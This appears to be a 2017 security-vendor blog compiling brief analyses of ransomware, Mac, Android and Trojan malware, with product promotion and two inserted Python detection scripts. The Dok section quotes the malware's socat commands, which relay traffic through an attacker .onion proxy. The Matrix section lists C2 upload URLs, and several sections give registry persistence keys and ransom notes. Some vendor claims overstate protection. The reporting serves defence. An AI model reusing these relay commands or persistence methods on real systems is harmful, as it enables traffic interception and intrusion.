WanaCry Ransomware

WanaCrypt, also known as WanaCry or “WannaCry”, is a new ransomware that wreaked havoc across the world last night. It spreads like a worm by leveraging a Windows SMB vulnerability (MS17-010) that Microsoft had already fixed in March. In these attacks, data is encrypted and the extension “.WCRY” is added to the filenames. The infection is initiated through an SMBv2 remote code execution flaw in Microsoft Windows. The exploit for it (codenamed “EternalBlue”) was made available on the internet through the Shadow Brokers dump on April 14th, 2017, and had been patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.

In the wake of the largest ransomware attack in history, which has already infected over 114,000 Windows systems worldwide in the last 24 hours, Microsoft has taken the unusual step of protecting customers with out-of-date computers. It has released an emergency security patch for all its unsupported versions of Windows, including Windows XP, Vista, Windows 8, Server 2003 and Server 2008. The patch can be downloaded from https://technet.microsoft.com/en-us/library/security/ms17-010.aspx .

People already infected with this ransomware will not get their files back. No new infections, however, will occur with yesterday’s strain. Currently, there is no known method of breaking the ransomware’s encryption. The only viable methods of getting files back at the moment are restoring from previous operating system backups or, as a last resort, paying the ransom. We recommend using Max Total Security, which can restore your files from its daily backup module (Tools > Max Backup Utility). It can also detect and terminate this ransomware to stop it spreading further on your PC.

Max Total Security also has a newly introduced module in its Tools menu, Tools > Max Application Whitelist. This module lets you completely protect your PC from any unauthorized or unwelcome executables. In normal day-to-day operation you know which programs you are going to use on your PC, so just go to this tool and allow those applications that run from the Program Files folder. System executables are already taken care of. From then on, no other executable will be allowed to run on your PC, completely protecting it from any type of Trojan.

Amnesia ransomware

The Amnesia Ransomware is used to take the victims’ files hostage. Ransomware Trojans like the Amnesia Ransomware are designed to encrypt the victim’s files using a strong encryption algorithm. It encrypts the victim’s files, preventing access to sensitive and other personal data, and appends the .amnesia extension to the name of every encrypted file. The attacker then demands a ransom in exchange for file decryption.
The files encrypted in the Amnesia Ransomware attack will no longer be readable and may show up as blank icons in Windows Explorer. The Amnesia Ransomware targets a wide variety of files, generally looking for user-generated files such as spreadsheets, text documents, images, videos, music files, databases, etc. The Amnesia Ransomware delivers its ransom note in the form of a text file named ‘HOW TO RECOVER ENCRYPTED FILES.TXT.’ This file alerts the victim to the attack and demands the payment of a ransom to recover the encrypted files. The full text of the Amnesia Ransomware ransom note:

‘YOUR FILES ARE ENCRYPTED!
Your personal ID:
[RANDOM CHARACTERS]
Attention! What happened?
Your documents, databases and other important data has been encrypted.
If you want to restore files send an email to: s1an1er111@protonmail.com
In a letter to indicate your personal identifier (see in the beginning of this document).
Attention!
* Do not attempt to remove the program or run the anti-virus tools.
* Attempts to self-decrypting files will result in the loss of your data.
* Decoders are not compatible with other users of your data, because each user’s unique encryption key.’

The best protection against the Amnesia Ransomware and similar ransomware threats is to keep backups of all files on an independent storage device or in the cloud, together with a reliable, fully up-to-date security program like Max Total Security that can intercept the Amnesia Ransomware and similar threats before they can infect the system.

Mikoyan ransomware

The infection process of the .MIKOYAN ransomware is very similar to that of other ransomware infections out there. The malware may take advantage of massive spam campaigns that distribute malicious attachments, as well as web links that lead to the download of the infection files. Such e-mails are cleverly crafted to convince users to open the attachment.

Besides e-mail, the .MIKOYAN ransomware virus may also be distributed via multiple other methods, such as:

Exploit kits.
A previous infection with a botnet or a Trojan.
Fake installers, Flash Player updates or other setup wizards.
Fake key generators or license activators uploaded to torrent websites.

Once this ransomware infection has become active on a computer, the .MIKOYAN virus drops its malicious payload files. They are often located in the following Windows directories:

%Common%
%AppData%
%LocalLow%
%Local%
%Roaming%
Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files under different, often randomly generated, names. After the encryption process has completed, the ransomware appends the .MIKOYAN file extension to the files it has encrypted.

To run on startup, the MIKOYAN ransomware may also modify the Windows Registry, more specifically the Run and RunOnce keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

As always, we recommend that you keep an updated copy of Max Total Security on your PC, which can restore your files from its built-in daily backup. Our 24×7 free support can also help you with any issues. You can get it from here: Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses located in Brazil (although nothing limits these attacks to Brazil, since they can target computers anywhere). The XPan Ransomware attacks are carried out by taking advantage of poorly protected remote desktop connections. By exploiting weak passwords and security measures, con artists can install the XPan Ransomware on the victims’ computers, as well as carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals, has already affected many computers belonging to small and medium businesses in the country. The similarities between XPan and the .one ransomware were found during an in-depth analysis of the malicious program. They include the target file extensions, the ransom note, the commands executed before and after the encryption process and even the criminals’ public RSA keys.

For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the CryptDeriveKey API, and proceeds to encrypt the file content using AES-256 in CBC mode with a zero IV. According to one of the victims, the criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as before: the user sends a message to a mailbox with his unique ID and waits for further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. This is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. The new malware, dubbed OSX/Dok, affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21st, 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app … gives all users execute permission
rm -fr "/Users/_%USER%_/Downloads/Dokument.app" … deletes the original copy
"/Users/Shared/Appstore.app/Contents/MacOS/AppStore" Dokument … executes the application

The malware also installs two LaunchAgents that start at system boot and have the following names:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

These LaunchAgents redirect requests made to 127.0.0.1 through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host 127.0.0.1).

These LaunchAgents run the following commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.
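To check a Mac for this persistence, a scanner for the LaunchAgent pattern above, added here as an example (not Check Point’s or Max Secure’s code): it parses each plist with Python’s plistlib and flags the socat relay to a .onion host and the Safari-lookalike labels. The two sample plists are constructed from the commands quoted above and are not real captured files.

```python
import plistlib
import re
from pathlib import Path

# Indicators taken from the page: Apple-looking labels and socat relaying to a .onion host.
SUSPICIOUS_LABEL_RE = re.compile(r"^com\.apple\.Safari\.(proxy|pac)$")
ONION_RE = re.compile(r"[a-z2-7]{16,56}\.onion", re.IGNORECASE)

def socat_proxy_indicators(program_args):
    """Reasons a ProgramArguments list resembles the Dok agents (empty list = nothing found)."""
    reasons = []
    if not program_args:
        return reasons
    joined = " ".join(str(a) for a in program_args)
    if Path(str(program_args[0])).name == "socat":
        reasons.append("socat used as a launch agent")
    if "LISTEN" in joined and "bind=127.0.0.1" in joined:
        reasons.append("listener bound to loopback")
    if ONION_RE.search(joined):
        reasons.append("forwards to a .onion address")
    if re.search(r"SOCKS4A?:", joined) and "socksport=" in joined:
        reasons.append("relays through a local SOCKS port (Tor)")
    return reasons

def assess_launch_agent(plist_bytes):
    """Parse one LaunchAgent plist; return (label, reasons)."""
    data = plistlib.loads(plist_bytes)
    label = data.get("Label", "")
    reasons = socat_proxy_indicators(data.get("ProgramArguments", []))
    if SUSPICIOUS_LABEL_RE.match(label):
        reasons.append("label mimics an Apple Safari component")
    return label, reasons

def scan_launch_agents(directory):
    """Scan every .plist in a LaunchAgents directory; return {filename: reasons} for hits."""
    findings = {}
    for path in Path(directory).glob("*.plist"):
        try:
            _, reasons = assess_launch_agent(path.read_bytes())
        except Exception:  # malformed plist: report it instead of aborting the scan
            reasons = ["unparseable plist"]
        if reasons:
            findings[path.name] = reasons
    return findings

# Constructed sample reproducing the first socat command quoted on the page.
SAMPLE_DOK_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.Safari.proxy</string>
<key>ProgramArguments</key><array>
<string>/usr/local/bin/socat</string>
<string>tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1</string>
<string>SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050</string>
</array></dict></plist>"""

# Constructed benign agent for contrast.
SAMPLE_BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/bin/rsync</string><string>-a</string></array>
</dict></plist>"""

if __name__ == "__main__":
    print(assess_launch_agent(SAMPLE_DOK_PLIST), assess_launch_agent(SAMPLE_BENIGN_PLIST))
    print(scan_launch_agents(Path.home() / "Library" / "LaunchAgents"))
```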

Beware of email attachments and do not enter your root password when asked by any app. Also, keep an updated copy of Mac Total Security by Max Secure Software.

MilkyDoor Android Malware

A newly discovered Android malware called MilkyDoor turns mobile devices into “walking backdoors” that give attackers access to whatever network an infected user is connected to. Affected phones essentially act as proxy servers that link legitimate networks with malicious command-and-control servers via Socket Secure (SOCKS) protocol, allowing bad actors to exfiltrate data.

It uses remote port forwarding via Secure Shell (SSH) tunnels to hide malicious traffic and grant attackers access to firewall-protected networks. The malware was recently found in over 200 Android applications on the Play Store; Google has since removed them from its official app store.

In total, researchers estimate the apps had between 500,000 and 1 million installs through the Play Store alone.
While MilkyDoor appears to be DressCode’s successor, it adds a few malicious tricks of its own. Among them are more clandestine routines that enable it to bypass security restrictions and conceal its malicious activities within normal network traffic. It does so by using remote port forwarding via an SSH tunnel over the commonly used port 22. The abuse of SSH lets the malware encrypt its malicious traffic and payloads, which makes detection trickier.

We found these Trojanized apps masquerading as recreational applications ranging from style guides and books for children to Doodle applications. We surmise that these are legitimate apps which cybercriminals repackaged and Trojanized then republished in Google Play, banking on their popularity to draw victims.

MilkyDoor poses greater risk to businesses due to how it’s coded to attack an enterprise’s internal networks, private servers, and ultimately, corporate assets and data. The way MilkyDoor builds an SSH tunnel presents security challenges for an organization’s network, particularly in networks that integrate BYOD devices. Its stealth lies in how the infected apps themselves don’t have sensitive permissions and consequently exist within the device using regular or seemingly benign communication behavior.

The repercussions are also significant. MilkyDoor can covertly grant attackers direct access to a variety of an enterprise’s services in the internal network, from web and FTP to SMTP. That access can then be leveraged to poll internal IP addresses in order to scan for available, and vulnerable, servers. The recent spate of compromises of MongoDB and ElasticSearch databases, whose owners were also extorted, is a case in point: the servers were publicly reachable, which was made worse by the lack of authentication mechanisms on the databases themselves.

End users and enterprises can benefit from our mobile security solution, Max Total Security, available on Google Play.

SMSVova Spyware - Android

SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time, was downloaded between 1 and 5 million times before being pulled from Google’s official U.S. Play Store. On the Play Store, the app was titled “System Update,” suggesting that users who download it would receive the latest Android release.

The malware, called SMSVova, is capable of pinpointing a user’s exact geolocation and then sending that data to an attacker. However, upon installing and opening SMSVova, the app immediately quits, delivering the following message: “Unfortunately, Update Service has stopped.” The app then hides itself from the main screen.

At this point, the app enables a MyLocationService feature that tracks a user’s last known location. It also scans for SMS message commands, which the attacker sends in order to adjust malware settings and ultimately request a user’s device location. The attacker can even specifically ask to receive a location alert when the victim’s battery is running low.


Despite the error message, the spyware sets up an Android service and broadcast receiver:

MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS messages

MyLocationService fetches the user’s last known location and stores it in Shared Preferences, one of the many ways Android stores an application’s data.
IncomingSMS is designed to look for incoming SMS messages with a particular syntax: the message must be more than 23 characters long and contain “vova-” in the SMS body. It also scans for a message containing “get faq.”

matrix9643@yahoo.com ransomware

Matrix virus, also known as the matrix9643@yahoo.com ransomware, functions as a crypto-Trojan. Matrix Ransomware has worm-like features that allow it to spread beyond the originally infected machine via Windows shortcuts. This malware appends the “.matrix” or “.b10cked” extension to the name of every encrypted file. For instance, “sample.jpg” is renamed to “sample.jpg.matrix”. Following successful encryption, Matrix creates a text file “matrix-readme.rtf” (newer variants drop a “Readme-Matrix.rtf” or “WhatHappenedWithMyFiles.rtf” file) containing the ransom demand and places it in every folder.


While performing the encryption, Matrix will hide a folder and then create a shortcut with the same name. It will then make a copy of the ransomware executable and save it as desktop.ini in the original folder:

Clicking on any shortcut will launch the malware program.
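A defender-side scan for the shortcut trap just described, added here as an example and not part of the original post: it walks a directory tree looking for a folder whose name is reused by a sibling .lnk shortcut and whose desktop.ini begins with the MZ header of a Windows executable. The sample tree it builds is constructed for the demo; run it with a path argument to scan a real share.

```python
import os
import sys
import tempfile
from pathlib import Path

def is_pe_executable(path):
    """True if the file starts with the 'MZ' header of a Windows executable."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"MZ"
    except OSError:
        return False

def is_hidden(path):
    """Hidden attribute on Windows; dot-prefix convention elsewhere."""
    if sys.platform == "win32":
        return bool(os.stat(path).st_file_attributes & 0x2)  # FILE_ATTRIBUTE_HIDDEN
    return Path(path).name.startswith(".")

def find_shortcut_traps(root):
    """Walk root and report every folder D that has a sibling D.lnk shortcut
    and a desktop.ini inside that is really a PE executable."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        present = set(filenames)
        for d in dirnames:
            lnk, ini = d + ".lnk", Path(dirpath, d, "desktop.ini")
            if lnk in present and is_pe_executable(ini):
                findings.append({
                    "folder": str(Path(dirpath, d)),
                    "shortcut": str(Path(dirpath, lnk)),
                    "payload": str(ini),
                    "hidden": is_hidden(Path(dirpath, d)),
                })
    return findings

def build_sample_tree(base):
    """Constructed sample, not from a real infection: one trapped folder, one benign."""
    base = Path(base)
    trapped = base / "Documents"
    trapped.mkdir()
    (trapped / "desktop.ini").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)  # fake PE stub
    (base / "Documents.lnk").write_bytes(b"L\x00\x00\x00")  # .lnk header bytes
    benign = base / "Pictures"
    benign.mkdir()
    (benign / "desktop.ini").write_text("[.ShellClassInfo]\nIconResource=shell32.dll,3\n")
    (base / "report.docx.matrix").write_bytes(b"\x00" * 16)  # an encrypted file
    return base

def run_demo():
    """Build the constructed tree in a temporary directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_shortcut_traps(build_sample_tree(tmp))

if __name__ == "__main__":
    hits = find_shortcut_traps(sys.argv[1]) if len(sys.argv) > 1 else run_demo()
    for h in hits:
        print(f"trap: {h['shortcut']} -> {h['payload']} (hidden={h['hidden']})")
```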

Files associated with the Matrix Ransomware:
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].hta
%UserProfile%\AppData\Roaming\[victim_id].pek
%UserProfile%\AppData\Roaming\[victim_id].sek
%UserProfile%\AppData\Roaming\errlog.txt
%UserProfile%\AppData\Roaming\[random].cmd
%UserProfile%\AppData\Roaming\[random].afn
%UserProfile%\AppData\Roaming\[random].ast
%UserProfile%\AppData\Roaming\[random].hta
matrix-readme.rtf
Bl0cked-ReadMe.rtf
WhatHappenedWithFiles.rtf

Network Communication:
stat3.s76.r53.com.ua/addrecord.php
stat3.s76.r53.com.ua/uploadextlist.php

With the increase in everyday ransomware activity, users are strongly advised to back up their files on a daily basis to minimize data loss, and to use a good anti-virus program such as Max Total Security, which can take daily backups with highly configurable options.

Rijndael Ransomware - another encryptor

The Rijndael Ransomware may be contained in files named ‘BitcoinMiner.exe’ and ‘r4ns0mw4r3.exe’ and seems to be the work of a coder who goes by the online handle ‘humanpuff69.’ This coder has uploaded YouTube videos with information on how to create rogue security software and clones of CryptoWall. Like most ransomware Trojans, the Rijndael Ransomware is designed to block all access to the victim’s files by encrypting them using a strong encryption algorithm. The files affected by the Rijndael Ransomware have the file extension ‘.fucked’ appended to each file’s name. The Rijndael Ransomware is capable of encrypting a wide variety of files.
To display its ransom note, the Rijndael Ransomware uses a program window that includes the message below:

‘Deathnote Hackers Was Here !
Your Computer files is encrypted
all files is encrypted with extremely
powerfull new RIDNDAEL encryption
that no one can break except you have
a private string and IVs
To Decrypt Your File You Should Pay Me
0.5 BTC (864.98 USD)
Contact Me : Riptours01@gmail.com
insert your code here:
[TEXT BOX] Decrypt!

Although it may be impossible to recover data encrypted by Trojans like the Rijndael Ransomware, the Rijndael Ransomware’s decryption key is hard coded into its main executable file and has been recovered from it. Victims can enter the code ’83KYG9NW-3K39V-2T3HJ-93F3Q-GT’ into the text box in the Rijndael Ransomware ransom message to restore their files. It is likely that the con artists will update the Rijndael Ransomware to remove this weakness, but for now computer users can recover their files from the attack.
Users can recover their encrypted file from Max Total Security Backup module.

Ramnit Trojan in new malvertising campaign

There has been an increase in malvertising activity coming from adult websites that have significant traffic (several million monthly visits each). Malicious actors are using pop-under ads (adverts that load in a new browser window under the current active page) to surreptitiously redirect users to the RIG exploit kit. It has mostly hit Canada and the UK.

Ramnit spies on you and sends everything it finds to the crooks behind it: IPs, usernames, passwords, accounts, email addresses, browser-related data, etc. Consider your private life no longer private. And last, but definitely not least, the Trojan may try to steal your money by making you purchase a fake anti-virus product or by presenting you with a fake update. Trust nothing. It is all a scam for profit. Don’t click on, and definitely don’t buy, anything Ramnit suggests, as you will only worsen your already bad situation.

To manually find its infection, do the following:
1. Run the Task Manager by right-clicking on the Taskbar and choosing Start Task Manager. Look carefully at the file names and descriptions of the running processes. If you find a suspicious one, search on Google for its name. If you find a malware process, right-click on it and choose End task.

2. Open the Control Panel’s Programs and Features applet by holding the Win key and R together. Type appwiz.cpl in the field, then click OK. Here, find any program you had no intention of installing and uninstall it.

3. Open MS Config by holding the Win key and R together. Type msconfig and hit Enter. Go to the Startup tab and uncheck entries that have “Unknown” as Manufacturer.

4. Scan with Max Total Security. If you still think your PC may be infected, contact Max Secure Software’s free 24×7 technical support.